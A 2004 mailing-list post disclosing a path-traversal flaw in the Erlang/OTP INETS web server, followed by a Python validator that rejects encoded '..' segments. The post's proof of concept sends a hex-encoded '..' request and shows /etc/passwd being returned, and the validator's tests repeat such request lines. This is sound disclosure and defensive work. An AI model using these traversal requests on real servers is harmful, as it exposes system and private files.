INETS security hole (you can escape from the document root)
Matthias Lang
matthias@REDACTED
Wed Aug 11 22:30:51 CEST 2004
Hi,
INETS, the HTTP server included in the OTP (R9C-1, but probably all
versions) has a security hole. URLs are not properly scrutinised for
relative paths. A malicious user can exploit this to read files
outside the document root.
Example:
~ >cd /tmp
tmp >mkdir logs
tmp >ln -s . conf
tmp >cat > httpd.conf
Port 8888
ServerName antilipe.corelatus.com
SocketType ip_comm
Modules mod_get
ServerRoot /tmp
DocumentRoot /tmp
tmp >erl
Erlang (BEAM) emulator version 5.3.6.2 [source] [hipe]
Eshell V5.3.6.2 (abort with ^G)
1> httpd:start("/tmp/httpd.conf").
{ok,<0.42.0>}
2> {ok, S} = gen_tcp:connect("localhost", 8888, []).
{ok,#Port<0.101>}
3>
3> gen_tcp:send(S, "GET /%2e%2e/etc/passwd HTTP/1.0\r\n\r\n").
ok
4> flush().
Shell got {tcp,#Port<0.101>,
"HTTP/1.1 200 OK
....
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
...
The problem is in httpd_parse:verify_request. That function is
supposed to reject URLs with '..' in them, but it fails to reject those
cases where the '..' is encoded fully or partially in hex.
But httpd_parse:verify_request seems broken by design. For instance,
it also rejects URLs which don't actually involve relative
directories, such as
/bla..ha
As far as I can tell, RFC1738 allows '..' in HTTP URLs.
Does anyone feel familiar with that code? Johan?
Matthias
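As an added illustration of the check the post says verify_request gets wrong in both directions, here is a segment-based path validator (example code written for this note, not INETS code and not in Erlang): it percent-decodes the request path once, as the server itself would before touching the filesystem, and then only treats a whole segment equal to '..' as a parent reference. This way "/%2e%2e/etc/passwd" and "/%2e./etc/passwd" are rejected, while a plain file name such as "/bla..ha" is accepted. The doc_root value and the request lines below are constructed sample inputs.

```python
import posixpath
from urllib.parse import unquote


def is_traversal(request_path: str) -> bool:
    """True if the (percent-encoded) request path climbs above the
    document root. Decode once, then walk the path segments and track
    the depth; a '..' segment at depth 0 escapes the root. A segment
    that merely contains dots ('bla..ha') is an ordinary file name."""
    decoded = unquote(request_path)  # %2e%2e -> .., %2E. -> ..
    depth = 0
    for segment in decoded.split("/"):
        if segment in ("", "."):
            continue  # empty (double slash) or current-dir segment
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True  # would step outside the document root
        else:
            depth += 1
    return False


def resolve_under_root(doc_root: str, request_path: str) -> str:
    """Map a request path onto a filesystem path under doc_root.
    Raises ValueError for traversal attempts; otherwise normalises
    '.', '..' and repeated slashes and joins below the root."""
    if is_traversal(request_path):
        raise ValueError("path escapes document root: %r" % request_path)
    normalised = posixpath.normpath("/" + unquote(request_path))
    return posixpath.join(doc_root, normalised.lstrip("/"))


def decide(doc_root: str, request_line: str) -> tuple:
    """Parse a request line such as 'GET /x HTTP/1.0' and return
    (status, filesystem_path_or_None) the way a GET handler would."""
    parts = request_line.strip().split()
    if len(parts) != 3 or parts[0] != "GET":
        return (400, None)
    try:
        return (200, resolve_under_root(doc_root, parts[1]))
    except ValueError:
        return (403, None)


if __name__ == "__main__":
    # constructed request lines mirroring the post's example and the
    # false-positive case it mentions
    for line in ("GET /%2e%2e/etc/passwd HTTP/1.0",
                 "GET /%2e./etc/passwd HTTP/1.0",
                 "GET /bla..ha HTTP/1.0",
                 "GET /a/../index.html HTTP/1.0"):
        print(line, "->", decide("/tmp", line))
```

The depth counter deliberately allows "/a/../index.html", which never leaves the root, so the check does not reintroduce the over-rejection the post complains about.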